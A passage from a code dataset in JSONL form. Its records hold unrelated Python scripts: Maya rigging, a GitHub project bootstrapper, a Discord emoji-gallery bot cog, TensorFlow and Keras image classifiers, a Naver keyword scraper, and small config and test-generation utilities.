bbox[5])\n\tp6=(bbox[3], bbox[1], bbox[2])\n\tp7=(bbox[3], bbox[1], bbox[5])\n\t\n\tpoints = [ p0, p1, p2, p3, p4, p5, p6, p7 ]\n\tpath_ids = [1,3,5,7,1,0,2,3,5,4,6,7,6,0,2,4]\n\tpath_values = []\n\t\n\tfor path_id in path_ids:\n\t\tpath_values.append( points[ path_id ] )\n\n\tcurve = pm.curve( p=path_values, n=(base_name+'_CTRL'), d=1 )\n\tcurve.rotatePivot.set( center_point )\n\tcurve.scalePivot.set( center_point )\n\tpm.move( curve, [0,0,0], rpr=True)\n\tpm.makeIdentity( curve, apply=True, n=0, t=True, r=True, s=True )\n\tcon_grp = pm.group( n=base_name+'Con_GRP', em=True )\n\tcon_grp.setParent( curve )\n\tgrp = pm.group( n=base_name+'Offset_GRP', em=True )\n\tpm.move( grp, center_point, rpr=True )\n\tcurve.setParent( grp, a=True )\n\tcurve.translate.set( [0,0,0] )\n\t\n\tshort_name = pm.ls( curve.name(), sn=True )[0].name()\n\tcolor = None\n\tleft_color = [ 6, 15, 29, 28, 18, 27 ]\n\tright_color = [ 13, 12, 31, 4, 30, 21 ]\n\tmiddle_color = [ 23, 11, 10, 25, 24, 7 ]\n\trandom_color = random.randint( 0, 5 )\n\t\n\tif short_name[0] == 'l':\n\t\tcolor = left_color[ random_color ]\n\telif short_name[0] == 'r':\n\t\tcolor = right_color[ random_color ]\n\telse:\n\t\tcolor = middle_color[ random_color ]\n\tcurve.getShape().overrideEnabled.set(1)\n\tcurve.getShape().overrideColor.set( color )\n\t\n\treturn grp\n\t\ndef select_polys_under_top_node( top_node ):\n\tresult = []\n\tfor transform in top_node.listRelatives(ad=True, type='transform'):\n\t\tif transform.getShape():\n\t\t\tif pm.objectType( transform.getShape() ) == 'mesh':\n\t\t\t\tresult.append( transform )\n\treturn result","sub_path":"mel/aw/maya/1.0/job_specific/delta/rig_transformer.py","file_name":"rig_transformer.py","file_ext":"py","file_size_in_byte":5211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"409294403","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n\"\"\"\nCREATE a NEW PROJECT\n\nthis script creates a 'full work ready' project from command line, including:\n - directory structure inside your $PROJECT_DIR\n - creation of the virtual-environment\n - first draft of common files like README.md, .gitignore & .env\n - .code-workspace & settings for vscode\n - complete git project initialisation & configuration\n - git flow initialisation, including first feature and release branches\n - pushing the repository to your GITHUB-Account\n \nrequired:\n - installed & available on your command-line: [GIT, curl]\n - virtualenvwrapper powershell (https://github.com/regisf/virtualenvwrapper-powershell)\n - a setup of your ENVIRONMENT-variables or a project_settings.json inside script-dir\n set at least:\n \"PROJECTS_DIR\" to your absolute project-path\n \"TOKEN\" to your GITHUB-CLI-Access-Token\n\"\"\"\n\n\"\"\"\nTODO:\n - check if required conditions are met / substitute curl with requests\n - add install of custom projects & requirements, folders, files\n - add other repo-services accounts (AZURE, bitbucket..)\n\"\"\"\n\n__version__ = \"0.2.0\"\n__author__ = \"oryon/dominik\"\n__date__ = \"April 01, 2019\"\n__updated__ = \"April 09, 2019\"\n\n\n# the name of the command alias in your shell - used to start this script\nCMD = \"newproject\"\n\n\nfrom argparse import ArgumentParser, RawTextHelpFormatter, SUPPRESS\nfrom pathlib import Path\nimport os\nimport sys\nimport subprocess\nimport textwrap\nfrom datetime import datetime\nimport getpass\nimport time\nimport shutil\nfrom json import load\nimport re\nimport requests\n\n\nDEFAULTS = {\n \"PROJECTS_DIR\": \"x:\\\\Meine 
Ablage\\\\_projects\",\n \"REPO\": \"GITHUB\",\n \"RELEASE\": \"0.1\", # starting-release number\n \"FEATURE\": \"Initial_Structure\", # first feature_name\n \"GIT_USER\": None,\n \"GIT_EMAIL\": None,\n}\n\n\nclass ArgParser(ArgumentParser):\n \"\"\"overwriting the parsers error-method to display help as error-default\"\"\"\n\n def error(self, message):\n self.print_help()\n sys.stderr.write(f\"\\nERROR: {message}\\n\")\n sys.exit(2)\n\n\ndef cmds_available():\n \"\"\"checks if required commands are installed\"\"\"\n if shutil.which(\"git\") is None:\n return False\n # TODO: add checks for virtualenvwrapper\n return True\n\n\ndef read_settings(filename=\"project_settings.json\", settings=DEFAULTS):\n \"\"\" reads settings file from disk \"\"\"\n script_path = Path(__file__).resolve().parent\n settings_path = Path(script_path, filename)\n # TODO: get settings from ENVS and/or local directory\n if not settings_path.exists():\n return settings\n else:\n with open(settings_path, \"r\") as file:\n try:\n loaded = load(file) # json.load\n for key in settings:\n if key not in loaded:\n loaded[key] = settings[key]\n return loaded\n except Exception as err:\n return settings\n\n\ndef print_status(message):\n \"\"\"prints status-messages **centered with dashes** while processing project-creation\"\"\"\n dashes = ((80 - len(message)) // 2) * \"-\"\n line = f\"{dashes}{message}{dashes}\"\n if len(line) % 2 != 0:\n line += \"-\"\n print(line)\n print()\n\n\ndef create(structure=\"basic\"):\n \"\"\"creating and filling all the basic files inside the working diretory\"\"\"\n\n def bedrock():\n README = textwrap.dedent(\n f\"\"\"\\\n # {NEW}\n \n {NEW} was created by {GIT_USER}({GIT_EMAIL}) at {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n \n \"\"\"\n )\n\n DOTENV = textwrap.dedent(\n \"\"\"\\\n PYTHONPATH=.\n \"\"\"\n )\n\n GITIGNORE = textwrap.dedent(\n f\"\"\"\\\n ## GIT is ignoring... (# Created by {GIT_USER})\n\n # git itself\n /.git/*\n\n # all logs\n *.log\n\n # vscode/settings\n /.vscode/*\n {NEW}.code-workspace\n\n # local-config\n /.env\n\n ### Python ###\n # precompiled\n __pycache__/\n *.py[cod]\n \"\"\"\n )\n\n VSCODE = textwrap.dedent(\n f\"\"\"\\\n {{\n \"folders\": [\n {{\n \"path\": \".\"\n }}\n ],\n \"settings\": {{\n \"files.autoSave\": \"onFocusChange\",\n \"python.venvPath\": \"~/Envs\",\n \"python.envFile\": \"${{workspaceFolder}}/.env\",\n \"python.terminal.activateEnvironment\": true,\n \"python.pythonPath\": \"C:\\\\\\\\Users\\\\\\\\{getpass.getuser()}\\\\\\\\envs\\\\\\\\{NEW}\\\\\\\\Scripts\\\\\\\\python.exe\",}}\n }}\n \"\"\"\n )\n\n with open(\".gitignore\", \"w\") as gitignore:\n gitignore.writelines(GITIGNORE)\n\n with open(\"README.md\", \"w\") as readme:\n readme.writelines(README)\n\n with open(f\"{NEW}.code-workspace\", \"w\") as vscode:\n vscode.writelines(VSCODE)\n\n with open(\".env\", \"w\") as dotenv:\n dotenv.writelines(DOTENV)\n\n if structure == \"basic\":\n bedrock()\n elif structure == \"flask\":\n bedrock()\n print(\"structure for flask-application is not implemented yet\")\n \"\"\"\n # best imported from python-submodule... 
new_flask_project.py\n import new_flask_project\n \n # see: https://www.digitalocean.com/community/tutorials/how-to-structure-large-flask-applications\n \n ~/LargeApp\n |-- run.py\n |-- config.py\n |__ /env # Virtual Environment\n |__ /app # Our Application Module\n |-- __init__.py\n |-- /module_one\n |-- __init__.py\n |-- controllers.py\n |-- models.py \n |__ /templates\n |__ /module_one\n |-- hello.html\n |__ /static\n |__ ..\n |__ .\n |__ ..\n |__ .\n \n mkdir ~/LargeApp\n mkdir ~/LargeApp/app\n mkdir ~/LargeApp/app/templates\n mkdir ~/LargeApp/app/static\n touch ~/LargeApp/run.py\n touch ~/LargeApp/config.py\n touch ~/LargeApp/app/__init__.py\n \n # install requirements inside the virtualenv..: pip install flask flask-sqlalchemy flask-wtf\n \n # fill run.py & config.py\n # etc ...\n \n new_flask_project.create()\n \n \"\"\"\n else:\n print(f\"structure for {structure} is not implemented yet\")\n\n\ndef init_project(structure=\"basic\"):\n \"\"\"processing all the shell-commands neccessary for the creation of a new-project\"\"\"\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n print_status(f\"Creating {NEW}\")\n\n # TODO: create error-catching & rollbacks\n\n projects = Path(PROJECTS_DIR)\n\n # switch to projects-directory\n os.chdir(str(projects))\n\n # $ mkdir <DIR>\n os.makedirs(NEW, exist_ok=True)\n new_project_path = projects / NEW\n\n # switch inside new_dir\n os.chdir(str(new_project_path))\n\n # mkvirtualenv <name>\n subprocess.call([\"powershell.exe\", \"mkvirtualenv\", NEW], shell=True)\n\n ## creating basic file & directory structure\n print_status(\"Creating Project-Structure\")\n create(structure)\n\n ## git init\n print_status(\"Initializing GIT\")\n subprocess.call(\"git init\", shell=True)\n subprocess.call(f'git config --local user.email \"{GIT_EMAIL}\"', shell=True)\n subprocess.call(f'git config --local user.name \"{GIT_USER}\"', shell=True)\n subprocess.call(\n f'git config --local core.sshCommand \"ssh -i ~/.ssh/id_rsa_{REPO}\"', shell=True\n )\n\n subprocess.call(\"git add .\", shell=True)\n subprocess.call('git commit -m \"Initial commit\"', shell=True)\n\n ## create public or private AZURE or GITHUB repo, set origin on github or azure\n print_status(\"Creating Repository\")\n if REPO == \"GITHUB\":\n subprocess.call(\n f'curl https://api.github.com/user/repos?access_token={TOKEN} -d \"{{\\\\\"name\\\\\": \\\\\"{NEW}\\\\\", \\\\\"private\\\\\": {str(PRIVATE).lower()}}}\"',\n shell=True,\n )\n subprocess.call(\n f\"git remote add origin git@github.com:{GIT_USER}/{NEW}.git\", shell=True\n )\n subprocess.call(\"git push -u origin master\", shell=True)\n else:\n print_status(\"Only GITHUB Repository Creation supported right now\")\n # POST https://dev.azure.com/{organization}/{project}/_apis/git/repositories\n # + project json\n\n print_status(\"Initializing GIT FLOW\")\n subprocess.call([\"git\", \"flow\", \"init\", \"-d\"], shell=True)\n\n subprocess.call(f'git config --local gitflow.prefix.feature \"feature/\"', shell=True)\n subprocess.call(f'git config --local gitflow.prefix.bugfix \"bugfix/\"', shell=True)\n subprocess.call(f'git config --local gitflow.prefix.release \"release/\"', shell=True)\n subprocess.call(f'git config --local gitflow.prefix.hotfix \"hotfix/\"', shell=True)\n subprocess.call(f'git config --local gitflow.prefix.support \"support/\"', shell=True)\n print_status(\"Set prefixes to feature/, bugfix/, release/, hotfix/, support/\")\n subprocess.call(\"git push -u origin develop\", shell=True)\n\n 
print_status(f\"Starting Release/{RELEASE}\")\n subprocess.call(f\"git flow release start {RELEASE}\", shell=True)\n subprocess.call(f\"git push -u origin release/{RELEASE}\", shell=True)\n\n print_status(f\"Starting Feature/{FEATURE}\")\n subprocess.call(f\"git flow feature start {FEATURE}\", shell=True)\n subprocess.call(f\"git push -u origin feature/{FEATURE}\", shell=True)\n\n print_status(f\"{NEW} created successfully\")\n print(f\"projects;cd {NEW};workon {NEW}\")\n\n\n# supported structures inside create()\nstructures = [\"flask\", \"django\"]\n\n# supported repositories:\nrepository_providers = [\"azure\", \"bitbucket\", \"github\"] # defaults on [-1]\n\n# set git user & email to git-config-values\nuser = (\n subprocess.check_output([\"git\", \"config\", \"user.name\"])\n .decode(\"utf-8\")\n .replace(\"\\n\", \"\")\n)\nemail = (\n subprocess.check_output([\"git\", \"config\", \"user.email\"])\n .decode(\"utf-8\")\n .replace(\"\\n\", \"\")\n)\nDEFAULTS[\"GIT_USER\"] = user\nDEFAULTS[\"GIT_EMAIL\"] = email\n\n# handling the arguments\nparser = ArgParser(\n description=__doc__,\n prog=f\"{CMD}\",\n epilog=f'Example usage: \"{CMD} world-domination --public\"\\n{\" \" * 15}\"{CMD} largeSecretApplication --app flask --repo azure\"',\n formatter_class=RawTextHelpFormatter,\n)\n\nparser.add_argument(\"--version\", action=\"version\", version=__version__)\nparser.add_argument(\n \"--public\",\n action=\"store_true\",\n help=\"The repository will be visible for anybody on the internet\",\n)\nparser.add_argument(\n \"name\",\n metavar=\"projectname\",\n help=\"The name of the project you want to create, doesn't accept spaces or underscores\",\n nargs=\"*\",\n)\nparser.add_argument(\n \"--app\",\n metavar=\", \".join(structures),\n default=\"basic\",\n const=\"basic\",\n nargs=\"?\",\n choices=structures,\n help=f\"create prebuild application structure\",\n)\nparser.add_argument(\n \"--repo\",\n metavar=\", \".join(repository_providers),\n nargs=\"?\",\n choices=repository_providers,\n help=f\"choose a provider for your repository (default: {repository_providers[-1]})\",\n)\nparser.add_argument(\n \"--user\",\n metavar=\"name\",\n nargs=\"?\",\n help=f\"provide the username for your repository\",\n)\nparser.add_argument(\n \"--email\",\n metavar=\"address\",\n nargs=\"?\",\n help=f\"provide the email-address for your repository\",\n)\n\n\nif __name__ == \"__main__\":\n\n args = parser.parse_args()\n settings = read_settings()\n\n # check: if used cmds (git etc.) 
are available\n    if not cmds_available():\n        parser.error(\"did not find required commands on the commandline\")\n\n    # check: projectname\n    NEW = \" \".join(args.name)\n    if not args.name:\n        while not NEW or \"_\" in NEW or \" \" in NEW:\n            NEW = input(\n                \"please enter a valid projectname (no spaces, no underscores) > \"\n            )\n    if \"_\" in \" \".join(args.name) or \" \" in \" \".join(args.name):\n        parser.error(\"spaces or underscores are not allowed in projectname\")\n\n    # check: PROJECTS_DIR directory\n    PROJECTS_DIR = os.environ.get(\"PROJECTS_DIR\", settings[\"PROJECTS_DIR\"])\n    while not Path(PROJECTS_DIR).exists():\n        sys.stderr.write(f\"\\nERROR: PROJECTS_DIR ({PROJECTS_DIR}) does not exist.\\n\")\n        PROJECTS_DIR = input(\"please enter a valid parent directory > \")\n\n    # publish the repository to the public\n    PRIVATE = not args.public\n\n    # check: used REPOsitory provider\n    if args.repo:\n        REPO = args.repo.upper()\n    else:\n        REPO = settings[\"REPO\"].upper()\n        if REPO not in [r.upper() for r in repository_providers]:\n            parser.error(\n                f'the repository provided in the settings ({settings[\"REPO\"]}) is not supported'\n            )\n\n    # check: user\n    if args.user and args.user != settings[\"GIT_USER\"]:\n        GIT_USER = args.user\n    else:\n        GIT_USER = settings[\"GIT_USER\"]\n    if not re.match(r\"^[a-zA-Z0-9]+([_-]?[a-zA-Z0-9])*$\", GIT_USER):\n        parser.error(f\"the username provided ({GIT_USER}) is invalid\")\n    if not GIT_USER:\n        parser.error(\"no username provided\")\n\n    # check: email\n    if args.email and args.email != settings[\"GIT_EMAIL\"]:\n        GIT_EMAIL = args.email\n    else:\n        GIT_EMAIL = settings[\"GIT_EMAIL\"]\n    if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", GIT_EMAIL):\n        parser.error(f\"the email provided ({GIT_EMAIL}) is invalid\")\n    if not GIT_EMAIL:\n        parser.error(\"no e-mail address provided\")\n\n    # set release & feature branch-names\n    RELEASE = settings[\"RELEASE\"]\n    FEATURE = settings[\"FEATURE\"]\n\n    # authentication\n    AUTH = False\n    TOKEN = os.environ.get(\"GITHUB_TOKEN\")\n    while not AUTH:\n        if not TOKEN:\n            TOKEN = getpass.getpass(\n                prompt=f\"{GIT_USER} please enter your personal {REPO} access token > \"\n            )\n        response = requests.get(\n            \"https://api.github.com/\", headers={\"Authorization\": f\"token {TOKEN}\"}\n        ).json() # TODO: GITHUB-specific!\n        if \"message\" in response:\n            if response[\"message\"] == \"Bad credentials\":\n                TOKEN = None\n                parser.error(\"authentication failed\")\n            else:\n                if os.environ.get(\"GITHUB_TOKEN\"):\n                    parser.error(response)\n                else:\n                    print(response)\n                    TOKEN = None\n                    print(\"TOKEN reset\")\n                    input(\"press any key to continue or CTRL-C to quit\")\n        else:\n            AUTH = True\n\n    # TODO: change when features are implemented\n    if args.app != \"basic\":\n        parser.error(f\"structure for {args.app} is not implemented yet\")\n    elif args.repo and args.repo != \"github\":\n        parser.error(f\"project creation on {args.repo} is not implemented yet\")\n\n    # starting project initialization\n    init_project(args.app)\n","sub_path":"scripts/python/new_project.py","file_name":"new_project.py","file_ext":"py","file_size_in_byte":15249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"277420807","text":"\nimport configparser\nfrom seasight_forecasting import global_vars\n\ndef LoadConfigFile():\n    config = configparser.ConfigParser()\n    configFilePath = r'app.conf'\n    config.read(configFilePath)\n\n    global_vars.historic_file_path = config['FILES']['historic_data_path'] + config['FILES']['historic_data_file']\n    global_vars.prediction_model_path = 
config['FILES']['prediction_model_path'] + config['FILES']['prediction_model_file']\n    global_vars.prediction_model_weights = config['FILES']['prediction_model_path'] + config['FILES']['prediction_model_weights']\n    global_vars.north_atlantic_region_path = config['FILES']['regions_path'] + config['FILES']['north_atlantic_region_file']\n    global_vars.south_atlantic_region_path = config['FILES']['regions_path'] + config['FILES']['south_atlantic_region_file']\n    global_vars.indian_region_path = config['FILES']['regions_path'] + config['FILES']['indian_region_file']\n    global_vars.west_pacific_region_path = config['FILES']['regions_path'] + config['FILES']['west_pacific_region_file']\n    global_vars.north_east_pacific_region_path = config['FILES']['regions_path'] + config['FILES']['north_east_pacific_region_file']\n    global_vars.south_east_pacific_region_path = config['FILES']['regions_path'] + config['FILES']['south_east_pacific_region_file']\n    global_vars.kml_destination_path = config['FILES']['kml_destination_path']\n    global_vars.kml_destination_filename = config['FILES']['kml_destination_file']\n    global_vars.image_destination_path = config['FILES']['image_destination_path']\n    global_vars.demo_files_path = config['FILES']['demo_files_path']\n\n    global_vars.number_of_clusters = int(config['KML']['number_of_clusters'])\n    global_vars.cmap = config['KML']['cmap']\n    global_vars.sleep_in_thread = int(config['KML']['sleep_in_thread'])\n    global_vars.altitude = int(config['KML']['altitude'])\n    global_vars.pRange = int(config['KML']['range'])\n\n    global_vars.server_IP = config['INSTALLATION']['server_IP']\n    global_vars.lg_IP = config['INSTALLATION']['lg_IP']\n    global_vars.lg_pass = config['INSTALLATION']['lg_pass']\n    global_vars.screen_for_logos = int(config['INSTALLATION']['screen_for_logos'])\n    global_vars.screen_for_colorbar = int(config['INSTALLATION']['screen_for_colorbar'])\n    global_vars.project_location = config['INSTALLATION']['project_location']\n    global_vars.logs = config['INSTALLATION']['logs']\n    global_vars.show_verbose = config['INSTALLATION']['show_verbose']\n\n    print('Global variables loaded!')\n","sub_path":"liquid_galaxy/ConfigurationFile.py","file_name":"ConfigurationFile.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"446798563","text":"import random\r\nimport os\r\nimport shutil\r\nimport subprocess\r\n\r\nfor s in range(1, 31):\r\n    # write 1000 lines to seeds.txt\r\n    unique_random_integers = random.sample(range(1, 1000000001), 1000) # generate 1000 unique random numbers\r\n    with open(\"my_seeds.txt\", \"w\") as file:\r\n        for r in unique_random_integers:\r\n            line = f\"{r} 0 0 {s*s}\\n\"\r\n            file.write(line)\r\n\r\n    # # run the cargo command\r\n    subprocess.run([\"cargo\", \"run\", \"--release\", \"--bin\", \"gen\", \"my_seeds.txt\"])\r\n\r\n    # build the directory name\r\n    dir_name = f\"S{s:02d}\"\r\n    print(dir_name)\r\n\r\n    # create the directory if it does not exist\r\n    if not os.path.exists(dir_name):\r\n        os.makedirs(dir_name)\r\n\r\n    # move everything inside the \"in\" directory\r\n    src_dir = \"in\"\r\n    for filename in os.listdir(src_dir):\r\n        src_path = os.path.join(src_dir, filename)\r\n        dest_path = os.path.join(dir_name, filename)\r\n        shutil.move(src_path, dest_path)\r\n\r\n    print(f\"Operation completed for s={s}\")\r\n","sub_path":"AtCoder/AHC022/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"35252868","text":"import math\nimport aiohttp\nimport 
discord\nfrom discord.ext import commands\nfrom extras.imgur import image_upload, image_delete\nfrom storage.db import Emoji as EmojiObj\nfrom storage.db import Guild\nfrom util.checks import no_private_message\n\nasync def _get_content_type(url):\n \"\"\"Checks page header and returns MIME content type.\"\"\"\n async with aiohttp.ClientSession() as session:\n async with session.head(url) as response:\n return response.headers.get('content-type')\n\n\nasync def _validate_url_image(url):\n \"\"\"Raises ValueError for unsupported content types.\"\"\"\n ctype = await _get_content_type(url)\n if(not ctype or not (ctype.startswith('image') or ctype.startswith('video'))):\n raise ValueError\n\n\ndef _emoji_embed(emoji):\n \"\"\"Generates a discord embed for an image.\"\"\"\n embed = discord.Embed()\n embed.set_image(url=emoji.url)\n embed.set_footer(text=emoji.name)\n return embed\n\n\nclass Emoji:\n def __init__(self, bot):\n self.bot = bot\n self.db = bot.database\n\n @commands.command(pass_context=True)\n @commands.check(no_private_message)\n async def emsave(self, ctx, name, url=None):\n \"\"\"Saves an emoji to my gallery. Can be a URL or direct attachment. Or you could just use this command right after an image is posted.\"\"\"\n # check if emoji exists\n e = self.db.get(EmojiObj, guild_id=ctx.message.server.id, name=name)\n if e:\n await ctx.bot.send_message(ctx.message.channel, '{} already exists'.format(name))\n return\n # attempt to find a valid image url\n try:\n if not url:\n # if url argument is missing, check attachments and message history\n if ctx.message.attachments:\n url = ctx.message.attachments[0]['url']\n else:\n async for log in ctx.bot.logs_from(ctx.message.channel, limit=1, before=ctx.message):\n if log.attachments:\n url = log.attachments[0]['url']\n else:\n url = log.content\n await _validate_url_image(url)\n except (TypeError, ValueError, discord.Forbidden, discord.NotFound, discord.HTTPException):\n await ctx.bot.send_message(ctx.message.channel, 'No valid image found.')\n return\n # upload image if found\n data = await image_upload(url)\n if 'error' in data:\n await ctx.bot.send_message(ctx.message.channel, '{}. 
Gallery copy failed: {}'.format(name, data['error']))\n        else:\n            e = EmojiObj(guild_id=ctx.message.server.id, name=name, url=data['link'])\n            self.db.add(e)\n            self.db.commit()\n            await ctx.bot.send_message(ctx.message.channel, 'Saved {}.'.format(name))\n\n    @commands.command(pass_context=True)\n    @commands.check(no_private_message)\n    async def em(self, ctx, name):\n        \"\"\"Repost an emoji from my gallery.\"\"\"\n        e = self.db.get(EmojiObj, guild_id=ctx.message.server.id, name=name)\n        if e:\n            await ctx.bot.send_message(ctx.message.channel, embed=_emoji_embed(e))\n\n    @commands.command(pass_context=True)\n    @commands.check(no_private_message)\n    async def emdelete(self, ctx, name):\n        \"\"\"Removes an emoji from my gallery.\"\"\"\n        e = self.db.get(EmojiObj, guild_id=ctx.message.server.id, name=name)\n        if not e:\n            await ctx.bot.send_message(ctx.message.channel, \"{} does not exist\".format(name))\n            return\n        self.db.delete(e)\n        self.db.commit()\n        await ctx.bot.send_message(ctx.message.channel, \"Deleted {}\".format(name))\n\n    @commands.command(pass_context=True)\n    @commands.check(no_private_message)\n    async def emlist(self, ctx):\n        \"\"\"Lists all emojis from my gallery.\"\"\"\n        emojis = self.db.getall(EmojiObj, guild_id=ctx.message.server.id)\n        e = []\n        for n in emojis:\n            e.append(n.name)\n        e.sort()\n\n        if not e:\n            await ctx.bot.send_message(ctx.message.channel, 'No emojis saved yet.')\n            return\n\n        max_e = len(e)\n        row_e = int(math.ceil(max_e / 3))\n\n        e1 = e[:row_e]\n        e2 = e[row_e:row_e*2]\n        e3 = e[row_e*2:]\n\n        row1 = \"\"\n        row2 = \"\"\n        row3 = \"\"\n\n        for x in e1:\n            row1 += \"\\n\"+x\n\n        for x in e2:\n            row2 += \"\\n\"+x\n\n        for x in e3:\n            row3 += \"\\n\"+x\n\n        embed = discord.Embed()\n\n        H1 = (e1[0][0] + \" - \" + e1[-1][0]).upper()\n        embed.add_field(name=H1, value=row1, inline=True)\n        if e2:\n            H2 = (e2[0][0] + \" - \" + e2[-1][0]).upper()\n            embed.add_field(name=H2, value=row2, inline=True)\n        if e3:\n            H3 = (e3[0][0] + \" - \" + e3[-1][0]).upper()\n            embed.add_field(name=H3, value=row3, inline=True)\n\n        await ctx.bot.send_message(ctx.message.channel, embed=embed)\n","sub_path":"extras/emoji.py","file_name":"emoji.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"233055614","text":"#coding=utf-8\n\nimport tensorflow as tf \nimport numpy as np \nimport pdb\nimport cv2\nimport os\nimport glob\nimport slim.nets.resnet_v2 as resnet\n\nfrom create_tf_record import *\nimport tensorflow.contrib.slim as slim\n\n\ndef predict(models_path,image_dir,labels_filename,labels_nums, data_format):\n    [batch_size, resize_height, resize_width, depths] = data_format\n\n    labels = np.loadtxt(labels_filename, str, delimiter='\\t')\n    input_images = tf.placeholder(dtype=tf.float32, shape=[None, resize_height, resize_width, depths], name='input')\n\n    with slim.arg_scope(resnet.resnet_arg_scope()):\n        out, end_points = resnet.resnet_v2_50(inputs=input_images, num_classes=labels_nums, is_training=False)\n\n    # run the logits through softmax, then take the class with the highest probability\n    score = tf.nn.softmax(out,name='pre')\n    class_id = tf.argmax(score, 1)\n\n    sess = tf.InteractiveSession()\n    sess.run(tf.global_variables_initializer())\n    saver = tf.train.Saver()\n    saver.restore(sess, models_path)\n    images_list=glob.glob(os.path.join(image_dir,'*.jpg'))\n    score_total = 0\n    for image_path in images_list:\n        im=read_image(image_path,resize_height,resize_width,normalization=True)\n        im=im[np.newaxis,:]\n        #pred = sess.run(f_cls, feed_dict={x:im, keep_prob:1.0})\n        pre_score,pre_label = sess.run([score,class_id], feed_dict={input_images:im})\n        max_score=pre_score[0,pre_label]\n        #print(\"{} is: pre labels:{},name:{} score: {}\".format(image_path, pre_label, labels[pre_label], max_score))\n        if image_path.split(\".jpg\")[0].split(\"-\")[2] == labels[pre_label]:\n            score_total += 1\n        else:\n            print(\"{} is predicted as label: {}\".format(image_path,labels[pre_label]))\n\n    print(\"validation accuracy is {}\".format(score_total/len(images_list)))\n    sess.close()\n\n\nif __name__ == '__main__':\n\n    class_nums=4\n    image_dir='./onsets/test/B/'\n    labels_filename='./onsets/label.txt'\n    models_path='./models/onsets/resnet/model.ckpt-10000'\n\n    batch_size = 1 #\n    resize_height = 224 # target height for stored images\n    resize_width = 224 # target width for stored images\n    depths=3\n    data_format=[batch_size,resize_height,resize_width,depths]\n    predict(models_path,image_dir, labels_filename, class_nums, data_format)\n","sub_path":"predict_resnet_onsets.py","file_name":"predict_resnet_onsets.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"4413684","text":"'''\r\nDate : 19-01-15\r\nDescription : crawl Naver real-time top search terms\r\n'''\r\n\r\n\r\nimport requests as req\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom datetime import datetime\r\n\r\nres = req.get('http://naver.com')\r\ndom = bs(res.text, 'html.parser')\r\n\r\ntitles = dom.select(\"#PM_ID_ct > div.header > div.section_navbar > div.area_hotkeyword.PM_CL_realtimeKeyword_base > div.ah_roll.PM_CL_realtimeKeyword_rolling_base > div > ul > li > a > span.ah_k\")\r\n\r\n#for li in titles:\r\n# print(li.text)\r\n\r\n# create the output file (timestamped name; the original format used %h, which is not an hour directive - %H is)\r\nfname = \"{:%y-%m-%d-%H-%M}.txt\".format(datetime.now())\r\nfile = open(fname, mode='w',encoding='utf-8')\r\n\r\n# write one search term per line\r\nfor tit in titles:\r\n    file.write(tit.text+'\\n')\r\n\r\nfile.close()\r\n","sub_path":"2-5.py","file_name":"2-5.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"17085157","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: bhumihar\n\"\"\"\n\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras import applications\nfrom keras.utils import np_utils\n\n# dimensions of our images.\nimg_width, img_height = 150, 150\n\ndatagen = ImageDataGenerator(rescale=1. 
/ 255)\n\ntop_model_weights_path = 'bottleneck_fc_model.h5'\ntrain_data_dir = '/home/bhumihar/Programming/Python/opencv/sample/project/Marcel-train' \nvalidation_data_dir = '/home/bhumihar/Programming/Python/opencv/sample/project/Marcel-test'\nnb_train_samples = 4872\nnb_validation_samples = 377\nepochs = 50\nbatch_size = 29\n\n # build the VGG16 network\ndef bottleneck_feature() :\n model = applications.VGG16(include_top=False, weights='imagenet')\n\n generator = datagen.flow_from_directory(\n train_data_dir,\n target_size=(150, 150),\n batch_size=batch_size,\n class_mode='categorical',\n shuffle=False) \n bottleneck_features_train = model.predict_generator(generator, nb_train_samples // batch_size,verbose=1)\n \n file = open('bottleneck_features_train.npy', 'wb')\n np.savez(file, bottleneck_features_train)\n \n generator = datagen.flow_from_directory(\n validation_data_dir,\n target_size=(150, 150),\n batch_size=batch_size,\n class_mode='categorical',\n shuffle=False)\n bottleneck_features_validation = model.predict_generator(generator, nb_validation_samples//batch_size,verbose=1)\n file = open('bottleneck_features_validation.npy', 'wb')\n np.savez(file, bottleneck_features_validation)\n \ndef train_top_model() :\n \n npyfile = np.load(\"bottleneck_features_train.npy\")\n a_size ,b_size,c_size,f_size,p_size,v_size = 1329,487,572,654,1395,435\n ac_size ,bc_size,cc_size,fc_size,pc_size,vc_size = 58,60,64,75,64,56\n train_data = npyfile['arr_0'] \n train_labels =np.array(([0] * int(a_size)) + ([1] * int(b_size)) + ([2] * int(c_size))\n + ([3] * int(f_size))+ ([4] * int(p_size))+ ([5] * int(v_size)))\n \n npyfile = np.load(\"bottleneck_features_validation.npy\")\n validation_data = npyfile['arr_0'] \n validation_labels = np.array(([0] * int(ac_size)) + ([1] * int(bc_size)) + ([2] * int(cc_size))\n + ([3] * int(fc_size))+ ([4] * int(pc_size))+ ([5] * int(vc_size)))\n \n \n train_labels = np_utils.to_categorical(train_labels, 6)\n validation_labels = np_utils.to_categorical(validation_labels, 6)\n model = Sequential()\n model.add(Flatten(input_shape=train_data.shape[1:]))\n model.add(Dense(256, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(6, activation='sigmoid'))\n \n model.compile(optimizer='rmsprop',\n loss='binary_crossentropy', metrics=['accuracy'])\n \n model.fit(train_data, 